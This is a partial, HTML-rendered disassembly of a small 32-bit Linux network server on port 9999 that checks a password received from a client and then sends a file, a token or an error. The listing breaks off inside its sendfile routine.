span class="code-line"span class="mh"08048660/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"recvfrom@plt/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048660: ff 25 1c 91 04 08 jmp DWORD PTR ds:0x804911c/span/span span class="code-line"span class="x" 8048666: 68 20 00 00 00 push 0x20/span/span span class="code-line"span class="x" 804866b: e9 a0 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"08048670/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"_IO_getc@plt/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048670: ff 25 20 91 04 08 jmp DWORD PTR ds:0x8049120/span/span span class="code-line"span class="x" 8048676: 68 28 00 00 00 push 0x28/span/span span class="code-line"span class="x" 804867b: e9 90 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"08048680/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"htons@plt/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048680: ff 25 24 91 04 08 jmp DWORD PTR ds:0x8049124/span/span span class="code-line"span class="x" 8048686: 68 30 00 00 00 push 0x30/span/span span class="code-line"span class="x" 804868b: e9 80 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"08048690/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"accept@plt/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048690: ff 25 28 91 04 08 jmp DWORD PTR ds:0x8049128/span/span span class="code-line"span class="x" 8048696: 68 38 00 00 00 push 0x38/span/span span class="code-line"span class="x" 804869b: e9 70 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"080486a0/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"puts@plt/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 80486a0: ff 25 2c 91 04 08 jmp DWORD PTR ds:0x804912c/span/span span class="code-line"span class="x" 80486a6: 68 40 00 00 00 push 0x40/span/span span class="code-line"span class="x" 80486ab: e9 60 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"080486b0/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"__gmon_start__@plt/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 80486b0: ff 25 30 91 04 08 jmp DWORD PTR ds:0x8049130/span/span span class="code-line"span class="x" 80486b6: 68 48 00 00 00 push 0x48/span/span span class="code-line"span class="x" 80486bb: e9 50 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"080486c0/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"exit@plt/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 80486c0: ff 25 34 91 04 08 jmp DWORD PTR ds:0x8049134/span/span span class="code-line"span class="x" 80486c6: 68 50 00 00 00 push 0x50/span/span span class="code-line"span class="x" 80486cb: e9 40 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"080486d0/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"strlen@plt/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 80486d0: ff 25 38 91 04 08 jmp DWORD PTR ds:0x8049138/span/span span class="code-line"span class="x" 80486d6: 68 58 00 00 00 push 0x58/span/span span class="code-line"span class="x" 80486db: e9 30 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"080486e0/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"__libc_start_main@plt/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 80486e0: ff 25 3c 91 04 08 jmp DWORD PTR ds:0x804913c/span/span span class="code-line"span class="x" 80486e6: 68 60 00 00 00 push 0x60/span/span span class="code-line"span class="x" 80486eb: e9 20 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"080486f0/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"bind@plt/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 80486f0: ff 25 40 91 04 08 jmp DWORD PTR ds:0x8049140/span/span span class="code-line"span class="x" 80486f6: 68 68 00 00 00 push 0x68/span/span span class="code-line"span class="x" 80486fb: e9 10 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"08048700/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"fopen@plt/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048700: ff 25 44 91 04 08 jmp DWORD PTR ds:0x8049144/span/span span class="code-line"span class="x" 8048706: 68 70 00 00 00 push 0x70/span/span span class="code-line"span class="x" 804870b: e9 00 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"08048710/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"strncpy@plt/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048710: ff 25 48 91 04 08 jmp DWORD PTR ds:0x8049148/span/span span class="code-line"span class="x" 8048716: 68 78 00 00 00 push 0x78/span/span span class="code-line"span class="x" 804871b: e9 f0 fe ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"08048720/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"sendto@plt/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048720: ff 25 4c 91 04 08 jmp DWORD PTR ds:0x804914c/span/span span class="code-line"span class="x" 8048726: 68 80 00 00 00 push 0x80/span/span span class="code-line"span class="x" 804872b: e9 e0 fe ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"08048730/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"htonl@plt/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048730: ff 25 50 91 04 08 jmp DWORD PTR ds:0x8049150/span/span span class="code-line"span class="x" 8048736: 68 88 00 00 00 push 0x88/span/span span class="code-line"span class="x" 804873b: e9 d0 fe ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"08048740/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"listen@plt/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048740: ff 25 54 91 04 08 jmp DWORD PTR ds:0x8049154/span/span span class="code-line"span class="x" 8048746: 68 90 00 00 00 push 0x90/span/span span class="code-line"span class="x" 804874b: e9 c0 fe ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"08048750/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"atoi@plt/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048750: ff 25 58 91 04 08 jmp DWORD PTR ds:0x8049158/span/span span class="code-line"span class="x" 8048756: 68 98 00 00 00 push 0x98/span/span span class="code-line"span class="x" 804875b: e9 b0 fe ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"08048760/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"socket@plt/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048760: ff 25 5c 91 04 08 jmp DWORD PTR ds:0x804915c/span/span span class="code-line"span class="x" 8048766: 68 a0 00 00 00 push 0xa0/span/span span class="code-line"span class="x" 804876b: e9 a0 fe ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"08048770/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"close@plt/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048770: ff 25 60 91 04 08 jmp DWORD PTR ds:0x8049160/span/span span class="code-line"span class="x" 8048776: 68 a8 00 00 00 push 0xa8/span/span span class="code-line"span class="x" 804877b: e9 90 fe ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"Disassembly of section span class="nl".text/spanspan class="p":/span/span span class="code-line"/span span class="code-line"span class="mh"08048780/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"_start/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048780: 31 ed xor ebp,ebp/span/span span class="code-line"span class="x" 8048782: 5e pop esi/span/span span class="code-line"span class="x" 8048783: 89 e1 mov ecx,esp/span/span span class="code-line"span class="x" 8048785: 83 e4 f0 and esp,0xfffffff0/span/span span class="code-line"span class="x" 8048788: 50 push eax/span/span span class="code-line"span class="x" 8048789: 54 push esp/span/span span class="code-line"span class="x" 804878a: 52 push edx/span/span span class="code-line"span class="x" 804878b: 68 00 8d 04 08 push 0x8048d00/span/span span class="code-line"span class="x" 8048790: 68 10 8d 04 08 push 0x8048d10/span/span span class="code-line"span class="x" 8048795: 51 push ecx/span/span span class="code-line"span class="x" 8048796: 56 push esi/span/span span class="code-line"span class="x" 8048797: 68 6c 88 04 08 push 0x804886c/span/span span class="code-line"span class="x" 804879c: e8 3f ff ff ff call 80486e0 lt;__libc_start_main@pltgt;/span/span span class="code-line"span class="x" 80487a1: f4 hlt /span/span span class="code-line"span class="x" 80487a2: 90 nop/span/span span class="code-line"span class="x" 80487a3: 90 nop/span/span span class="code-line"span class="x" 80487a4: 90 nop/span/span span class="code-line"span class="x" 80487a5: 90 nop/span/span span class="code-line"span class="x" 80487a6: 90 nop/span/span span class="code-line"span class="x" 80487a7: 90 nop/span/span span class="code-line"span class="x" 80487a8: 90 nop/span/span span class="code-line"span class="x" 80487a9: 90 nop/span/span span class="code-line"span class="x" 80487aa: 90 nop/span/span span class="code-line"span class="x" 80487ab: 90 nop/span/span span class="code-line"span class="x" 80487ac: 90 nop/span/span span class="code-line"span class="x" 80487ad: 90 nop/span/span span class="code-line"span class="x" 80487ae: 90 nop/span/span span class="code-line"span class="x" 80487af: 90 nop/span/span span class="code-line"/span span class="code-line"span class="mh"080487b0/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"deregister_tm_clones/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 80487b0: b8 6f 91 04 08 mov eax,0x804916f/span/span span class="code-line"span class="x" 80487b5: 2d 6c 91 04 08 sub eax,0x804916c/span/span span class="code-line"span class="x" 80487ba: 83 f8 06 cmp eax,0x6/span/span span class="code-line"span class="x" 80487bd: 77 02 ja 80487c1 lt;deregister_tm_clones+0x11gt;/span/span span class="code-line"span class="x" 80487bf: f3 c3 repz ret /span/span span class="code-line"span class="x" 80487c1: b8 00 00 00 00 mov eax,0x0/span/span span class="code-line"span class="x" 80487c6: 85 c0 test eax,eax/span/span span class="code-line"span class="x" 80487c8: 74 f5 je 80487bf lt;deregister_tm_clones+0xfgt;/span/span span class="code-line"span class="x" 80487ca: 55 push ebp/span/span span class="code-line"span class="x" 80487cb: 89 e5 mov ebp,esp/span/span span class="code-line"span class="x" 80487cd: 83 ec 18 sub esp,0x18/span/span span class="code-line"span class="x" 80487d0: c7 04 24 6c 91 04 08 mov DWORD PTR [esp],0x804916c/span/span span class="code-line"span class="x" 80487d7: ff d0 call eax/span/span span class="code-line"span class="x" 80487d9: c9 leave /span/span span class="code-line"span class="x" 80487da: c3 ret /span/span span class="code-line"span class="x" 80487db: 90 nop/span/span span class="code-line"span class="x" 80487dc: 8d 74 26 00 lea esi,[esi+eiz*1+0x0]/span/span span class="code-line"/span span class="code-line"span class="mh"080487e0/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"register_tm_clones/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 80487e0: b8 6c 91 04 08 mov eax,0x804916c/span/span span class="code-line"span class="x" 80487e5: 2d 6c 91 04 08 sub eax,0x804916c/span/span span class="code-line"span class="x" 80487ea: c1 f8 02 sar eax,0x2/span/span span class="code-line"span class="x" 80487ed: 89 c2 mov edx,eax/span/span span class="code-line"span class="x" 80487ef: c1 ea 1f shr edx,0x1f/span/span span class="code-line"span class="x" 80487f2: 01 d0 add eax,edx/span/span span class="code-line"span class="x" 80487f4: d1 f8 sar eax,1/span/span span class="code-line"span class="x" 80487f6: 75 02 jne 80487fa lt;register_tm_clones+0x1agt;/span/span span class="code-line"span class="x" 80487f8: f3 c3 repz ret /span/span span class="code-line"span class="x" 80487fa: ba 00 00 00 00 mov edx,0x0/span/span span class="code-line"span class="x" 80487ff: 85 d2 test edx,edx/span/span span class="code-line"span class="x" 8048801: 74 f5 je 80487f8 lt;register_tm_clones+0x18gt;/span/span span class="code-line"span class="x" 8048803: 55 push ebp/span/span span class="code-line"span class="x" 8048804: 89 e5 mov ebp,esp/span/span span class="code-line"span class="x" 8048806: 83 ec 18 sub esp,0x18/span/span span class="code-line"span class="x" 8048809: 89 44 24 04 mov DWORD PTR [esp+0x4],eax/span/span span class="code-line"span class="x" 804880d: c7 04 24 6c 91 04 08 mov DWORD PTR [esp],0x804916c/span/span span class="code-line"span class="x" 8048814: ff d2 call edx/span/span span class="code-line"span class="x" 8048816: c9 leave /span/span span class="code-line"span class="x" 8048817: c3 ret /span/span span class="code-line"span class="x" 8048818: 90 nop/span/span span class="code-line"span class="x" 8048819: 8d b4 26 00 00 00 00 lea esi,[esi+eiz*1+0x0]/span/span span class="code-line"/span span class="code-line"span class="mh"08048820/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"__do_global_dtors_aux/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048820: 80 3d 6c 91 04 08 00 cmp BYTE PTR ds:0x804916c,0x0/span/span span class="code-line"span class="x" 8048827: 75 13 jne 804883c lt;__do_global_dtors_aux+0x1cgt;/span/span span class="code-line"span class="x" 8048829: 55 push ebp/span/span span class="code-line"span class="x" 804882a: 89 e5 mov ebp,esp/span/span span class="code-line"span class="x" 804882c: 83 ec 08 sub esp,0x8/span/span span class="code-line"span class="x" 804882f: e8 7c ff ff ff call 80487b0 lt;deregister_tm_clonesgt;/span/span span class="code-line"span class="x" 8048834: c6 05 6c 91 04 08 01 mov BYTE PTR ds:0x804916c,0x1/span/span span class="code-line"span class="x" 804883b: c9 leave /span/span span class="code-line"span class="x" 804883c: f3 c3 repz ret /span/span span class="code-line"span class="x" 804883e: 66 90 xchg ax,ax/span/span span class="code-line"/span span class="code-line"span class="mh"08048840/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"frame_dummy/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048840: a1 08 90 04 08 mov eax,ds:0x8049008/span/span span class="code-line"span class="x" 8048845: 85 c0 test eax,eax/span/span span class="code-line"span class="x" 8048847: 74 1e je 8048867 lt;frame_dummy+0x27gt;/span/span span class="code-line"span class="x" 8048849: b8 00 00 00 00 mov eax,0x0/span/span span class="code-line"span class="x" 804884e: 85 c0 test eax,eax/span/span span class="code-line"span class="x" 8048850: 74 15 je 8048867 lt;frame_dummy+0x27gt;/span/span span class="code-line"span class="x" 8048852: 55 push ebp/span/span span class="code-line"span class="x" 8048853: 89 e5 mov ebp,esp/span/span span class="code-line"span class="x" 8048855: 83 ec 18 sub esp,0x18/span/span span class="code-line"span class="x" 8048858: c7 04 24 08 90 04 08 mov DWORD PTR [esp],0x8049008/span/span span class="code-line"span class="x" 804885f: ff d0 call eax/span/span span class="code-line"span class="x" 8048861: c9 leave /span/span span class="code-line"span class="x" 8048862: e9 79 ff ff ff jmp 80487e0 lt;register_tm_clonesgt;/span/span span class="code-line"span class="x" 8048867: e9 74 ff ff ff jmp 80487e0 lt;register_tm_clonesgt;/span/span span class="code-line"/span span class="code-line"span class="mh"0804886c/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"main/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 804886c: 55 push ebp/span/span span class="code-line"span class="x" 804886d: 89 e5 mov ebp,esp/span/span span class="code-line"span class="x" 804886f: 83 e4 f0 and esp,0xfffffff0/span/span span class="code-line"span class="x" 8048872: 81 ec 40 04 00 00 sub esp,0x440/span/span span class="code-line"span class="x" 8048878: c7 44 24 08 00 00 00 mov DWORD PTR [esp+0x8],0x0/span/span span class="code-line"span class="x" 804887f: 00 /span/span span class="code-line"span class="x" 8048880: c7 44 24 04 01 00 00 mov DWORD PTR [esp+0x4],0x1/span/span span class="code-line"span class="x" 8048887: 00 /span/span span class="code-line"span class="x" 8048888: c7 04 24 02 00 00 00 mov DWORD PTR [esp],0x2/span/span span class="code-line"span class="x" 804888f: e8 cc fe ff ff call 8048760 lt;socket@pltgt;/span/span span class="code-line"span class="x" 8048894: 89 84 24 3c 04 00 00 mov DWORD PTR [esp+0x43c],eax/span/span span class="code-line"span class="x" 804889b: c7 44 24 04 10 00 00 mov DWORD PTR [esp+0x4],0x10/span/span span class="code-line"span class="x" 80488a2: 00 /span/span span class="code-line"span class="x" 80488a3: 8d 84 24 20 04 00 00 lea eax,[esp+0x420]/span/span span class="code-line"span class="x" 80488aa: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 80488ad: e8 8e fd ff ff call 8048640 lt;bzero@pltgt;/span/span span class="code-line"span class="x" 80488b2: 66 c7 84 24 20 04 00 mov WORD PTR [esp+0x420],0x2/span/span span class="code-line"span class="x" 80488b9: 00 02 00 /span/span span class="code-line"span class="x" 80488bc: c7 04 24 00 00 00 00 mov DWORD PTR [esp],0x0/span/span span class="code-line"span class="x" 80488c3: e8 68 fe ff ff call 8048730 lt;htonl@pltgt;/span/span span class="code-line"span class="x" 80488c8: 89 84 24 24 04 00 00 mov DWORD PTR [esp+0x424],eax/span/span span class="code-line"span class="x" 80488cf: c7 04 24 0f 27 00 00 mov DWORD PTR [esp],0x270f/span/span span class="code-line"span class="x" 80488d6: e8 a5 fd ff ff call 8048680 lt;htons@pltgt;/span/span span class="code-line"span class="x" 80488db: 66 89 84 24 22 04 00 mov WORD PTR [esp+0x422],ax/span/span span class="code-line"span class="x" 80488e2: 00 /span/span span class="code-line"span class="x" 80488e3: c7 44 24 08 10 00 00 mov DWORD PTR [esp+0x8],0x10/span/span span class="code-line"span class="x" 80488ea: 00 /span/span span class="code-line"span class="x" 80488eb: 8d 84 24 20 04 00 00 lea eax,[esp+0x420]/span/span span class="code-line"span class="x" 80488f2: 89 44 24 04 mov DWORD PTR [esp+0x4],eax/span/span span class="code-line"span class="x" 80488f6: 8b 84 24 3c 04 00 00 mov eax,DWORD PTR [esp+0x43c]/span/span span class="code-line"span class="x" 80488fd: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048900: e8 eb fd ff ff call 80486f0 lt;bind@pltgt;/span/span span class="code-line"span class="x" 8048905: 89 84 24 38 04 00 00 mov DWORD PTR [esp+0x438],eax/span/span span class="code-line"span class="x" 804890c: 83 bc 24 38 04 00 00 cmp DWORD PTR [esp+0x438],0x0/span/span span class="code-line"span class="x" 8048913: 00 /span/span span class="code-line"span class="x" 8048914: 74 20 je 8048936 lt;main+0xcagt;/span/span span class="code-line"span class="x" 8048916: c7 44 24 04 0f 27 00 mov DWORD PTR [esp+0x4],0x270f/span/span span class="code-line"span class="x" 804891d: 00 /span/span span class="code-line"span class="x" 804891e: c7 04 24 90 8d 04 08 mov DWORD PTR [esp],0x8048d90/span/span span class="code-line"span class="x" 8048925: e8 06 fd ff ff call 8048630 lt;printf@pltgt;/span/span span class="code-line"span class="x" 804892a: c7 04 24 01 00 00 00 mov DWORD PTR [esp],0x1/span/span span class="code-line"span class="x" 8048931: e8 8a fd ff ff call 80486c0 lt;exit@pltgt;/span/span span class="code-line"span class="x" 8048936: c7 44 24 04 00 04 00 mov DWORD PTR [esp+0x4],0x400/span/span span class="code-line"span class="x" 804893d: 00 /span/span span class="code-line"span class="x" 804893e: 8b 84 24 3c 04 00 00 mov eax,DWORD PTR [esp+0x43c]/span/span span class="code-line"span class="x" 8048945: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048948: e8 f3 fd ff ff call 8048740 lt;listen@pltgt;/span/span span class="code-line"span class="x" 804894d: c7 84 24 0c 04 00 00 mov DWORD PTR [esp+0x40c],0x10/span/span span class="code-line"span class="x" 8048954: 10 00 00 00 /span/span span class="code-line"span class="x" 8048958: 8d 84 24 0c 04 00 00 lea eax,[esp+0x40c]/span/span span class="code-line"span class="x" 804895f: 89 44 24 08 mov DWORD PTR [esp+0x8],eax/span/span span class="code-line"span class="x" 8048963: 8d 84 24 10 04 00 00 lea eax,[esp+0x410]/span/span span class="code-line"span class="x" 804896a: 89 44 24 04 mov DWORD PTR [esp+0x4],eax/span/span span class="code-line"span class="x" 804896e: 8b 84 24 3c 04 00 00 mov eax,DWORD PTR [esp+0x43c]/span/span span class="code-line"span class="x" 8048975: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048978: e8 13 fd ff ff call 8048690 lt;accept@pltgt;/span/span span class="code-line"span class="x" 804897d: 89 84 24 34 04 00 00 mov DWORD PTR [esp+0x434],eax/span/span span class="code-line"span class="x" 8048984: 8d 84 24 0c 04 00 00 lea eax,[esp+0x40c]/span/span span class="code-line"span class="x" 804898b: 89 44 24 14 mov DWORD PTR [esp+0x14],eax/span/span span class="code-line"span class="x" 804898f: 8d 84 24 10 04 00 00 lea eax,[esp+0x410]/span/span span class="code-line"span class="x" 8048996: 89 44 24 10 mov DWORD PTR [esp+0x10],eax/span/span span class="code-line"span class="x" 804899a: c7 44 24 0c 00 00 00 mov DWORD PTR [esp+0xc],0x0/span/span span class="code-line"span class="x" 80489a1: 00 /span/span span class="code-line"span class="x" 80489a2: c7 44 24 08 e8 03 00 mov DWORD PTR [esp+0x8],0x3e8/span/span span class="code-line"span class="x" 80489a9: 00 /span/span span class="code-line"span class="x" 80489aa: 8d 44 24 24 lea eax,[esp+0x24]/span/span span class="code-line"span class="x" 80489ae: 89 44 24 04 mov DWORD PTR [esp+0x4],eax/span/span span class="code-line"span class="x" 80489b2: 8b 84 24 34 04 00 00 mov eax,DWORD PTR [esp+0x434]/span/span span class="code-line"span class="x" 80489b9: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 80489bc: e8 9f fc ff ff call 8048660 lt;recvfrom@pltgt;/span/span span class="code-line"span class="x" 80489c1: 89 84 24 30 04 00 00 mov DWORD PTR [esp+0x430],eax/span/span span class="code-line"span class="x" 80489c8: 8d 54 24 24 lea edx,[esp+0x24]/span/span span class="code-line"span class="x" 80489cc: 8b 84 24 30 04 00 00 mov eax,DWORD PTR [esp+0x430]/span/span span class="code-line"span class="x" 80489d3: 01 d0 add eax,edx/span/span span class="code-line"span class="x" 80489d5: c6 00 00 mov BYTE PTR [eax],0x0/span/span span class="code-line"span class="x" 80489d8: 8d 44 24 24 lea eax,[esp+0x24]/span/span span class="code-line"span class="x" 80489dc: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 80489df: e8 a8 02 00 00 call 8048c8c lt;checkpassgt;/span/span span class="code-line"span class="x" 80489e4: 89 84 24 38 04 00 00 mov DWORD PTR [esp+0x438],eax/span/span span class="code-line"span class="x" 80489eb: 83 bc 24 38 04 00 00 cmp DWORD PTR [esp+0x438],0x0/span/span span class="code-line"span class="x" 80489f2: 00 /span/span span class="code-line"span class="x" 80489f3: 0f 84 8c 00 00 00 je 8048a85 lt;main+0x219gt;/span/span span class="code-line"span class="x" 80489f9: 83 bc 24 38 04 00 00 cmp DWORD PTR [esp+0x438],0x5/span/span span class="code-line"span class="x" 8048a00: 05 /span/span span class="code-line"span class="x" 8048a01: 74 45 je 8048a48 lt;main+0x1dcgt;/span/span span class="code-line"span class="x" 8048a03: 8d 44 24 24 lea eax,[esp+0x24]/span/span span class="code-line"span class="x" 8048a07: 89 44 24 14 mov DWORD PTR [esp+0x14],eax/span/span span class="code-line"span class="x" 8048a0b: 8b 84 24 10 04 00 00 mov eax,DWORD PTR [esp+0x410]/span/span span class="code-line"span class="x" 8048a12: 89 44 24 04 mov DWORD PTR [esp+0x4],eax/span/span span class="code-line"span class="x" 8048a16: 8b 84 24 14 04 00 00 mov eax,DWORD PTR [esp+0x414]/span/span span class="code-line"span class="x" 8048a1d: 89 44 24 08 mov DWORD PTR [esp+0x8],eax/span/span span class="code-line"span class="x" 8048a21: 8b 84 24 18 04 00 00 mov eax,DWORD PTR [esp+0x418]/span/span span class="code-line"span class="x" 8048a28: 89 44 24 0c mov DWORD PTR [esp+0xc],eax/span/span span class="code-line"span class="x" 8048a2c: 8b 84 24 1c 04 00 00 mov eax,DWORD PTR [esp+0x41c]/span/span span class="code-line"span class="x" 8048a33: 89 44 24 10 mov DWORD PTR [esp+0x10],eax/span/span span class="code-line"span class="x" 8048a37: 8b 84 24 34 04 00 00 mov eax,DWORD PTR [esp+0x434]/span/span span class="code-line"span class="x" 8048a3e: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048a41: e8 41 01 00 00 call 8048b87 lt;senderrorgt;/span/span span class="code-line"span class="x" 8048a46: eb 78 jmp 8048ac0 lt;main+0x254gt;/span/span span class="code-line"span class="x" 8048a48: 8b 84 24 10 04 00 00 mov eax,DWORD PTR [esp+0x410]/span/span span class="code-line"span class="x" 8048a4f: 89 44 24 04 mov DWORD PTR [esp+0x4],eax/span/span span class="code-line"span class="x" 8048a53: 8b 84 24 14 04 00 00 mov eax,DWORD PTR [esp+0x414]/span/span span class="code-line"span class="x" 8048a5a: 89 44 24 08 mov DWORD PTR [esp+0x8],eax/span/span span class="code-line"span class="x" 8048a5e: 8b 84 24 18 04 00 00 mov eax,DWORD PTR [esp+0x418]/span/span span class="code-line"span class="x" 8048a65: 89 44 24 0c mov DWORD PTR [esp+0xc],eax/span/span span class="code-line"span class="x" 8048a69: 8b 84 24 1c 04 00 00 mov eax,DWORD PTR [esp+0x41c]/span/span span class="code-line"span class="x" 8048a70: 89 44 24 10 mov DWORD PTR [esp+0x10],eax/span/span span class="code-line"span class="x" 8048a74: 8b 84 24 34 04 00 00 mov eax,DWORD PTR [esp+0x434]/span/span span class="code-line"span class="x" 8048a7b: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048a7e: e8 76 01 00 00 call 8048bf9 lt;sendtokengt;/span/span span class="code-line"span class="x" 8048a83: eb 3b jmp 8048ac0 lt;main+0x254gt;/span/span span class="code-line"span class="x" 8048a85: 8b 84 24 10 04 00 00 mov eax,DWORD PTR [esp+0x410]/span/span span class="code-line"span class="x" 8048a8c: 89 44 24 04 mov DWORD PTR [esp+0x4],eax/span/span span class="code-line"span class="x" 8048a90: 8b 84 24 14 04 00 00 mov eax,DWORD PTR [esp+0x414]/span/span span class="code-line"span class="x" 8048a97: 89 44 24 08 mov DWORD PTR [esp+0x8],eax/span/span span class="code-line"span class="x" 8048a9b: 8b 84 24 18 04 00 00 mov eax,DWORD PTR [esp+0x418]/span/span span class="code-line"span class="x" 8048aa2: 89 44 24 0c mov DWORD PTR [esp+0xc],eax/span/span span class="code-line"span class="x" 8048aa6: 8b 84 24 1c 04 00 00 mov eax,DWORD PTR [esp+0x41c]/span/span span class="code-line"span class="x" 8048aad: 89 44 24 10 mov DWORD PTR [esp+0x10],eax/span/span span class="code-line"span class="x" 8048ab1: 8b 84 24 34 04 00 00 mov eax,DWORD PTR [esp+0x434]/span/span span class="code-line"span class="x" 8048ab8: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048abb: e8 34 00 00 00 call 8048af4 lt;sendfilegt;/span/span span class="code-line"span class="x" 8048ac0: c7 04 24 b2 8d 04 08 mov DWORD PTR [esp],0x8048db2/span/span span class="code-line"span class="x" 8048ac7: e8 d4 fb ff ff call 80486a0 lt;puts@pltgt;/span/span span class="code-line"span class="x" 8048acc: 8d 44 24 24 lea eax,[esp+0x24]/span/span span class="code-line"span class="x" 8048ad0: 89 44 24 04 mov DWORD PTR [esp+0x4],eax/span/span span class="code-line"span class="x" 8048ad4: c7 04 24 ca 8d 04 08 mov DWORD PTR [esp],0x8048dca/span/span span class="code-line"span class="x" 8048adb: e8 50 fb ff ff call 8048630 lt;printf@pltgt;/span/span span class="code-line"span class="x" 8048ae0: 8b 84 24 34 04 00 00 mov eax,DWORD PTR [esp+0x434]/span/span span class="code-line"span class="x" 8048ae7: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048aea: e8 81 fc ff ff call 8048770 lt;close@pltgt;/span/span span class="code-line"span class="x" 8048aef: e9 59 fe ff ff jmp 804894d lt;main+0xe1gt;/span/span span class="code-line"/span span class="code-line"span class="mh"08048af4/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"sendfile/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048af4: 55 push ebp/span/span span class="code-line"span class="x" 8048af5: 89 e5 mov ebp,esp/span/span span class="code-line"span class="x" 8048af7: 83 ec 38 sub esp,0x38/span/span span class="code-line"span class="x" 8048afa: c7 44 24 04 cd 8d 04 mov DWORD PTR [esp+0x4],0x8048dcd/span/span span class="code-line"span class="x" 8048b01: 08 /span/span span class="code-line"span class="x" 8048b02: c7 04 24 cf 8d 04 08 mov DWORD PTR [esp],0x8048dcf/span/span span class="code-line"span class="x" 8048b09: e8 f2 fb ff ff call 8048700 lt;fopen@pltgt;/span/span span class="code-line"span class="x" 8048b0e: 89 45 f4 mov DWORD PTR [ebp-0xc],eax/span/span span class="code-line"span class="x" 8048b11: 83 7d f4 00 cmp DWORD PTR [ebp-0xc],0x0/span/span span class="code-line"span class="x" 8048b15: 74 56 je 8048b6d lt;sendfile+0x79gt;/span/span span class="code-line"span class="x" 8048b17: eb 31 jmp 8048b4a lt;sendfile+0x56gt;/span/span span class="code-line"span class="x" 8048b19: c7 44 24 14 10 00 00 mov DWORD PTR [esp+0x14],0x10/span/span span class="code-line"span class="x" 8048b20: 00 /span/span span class="code-line"span 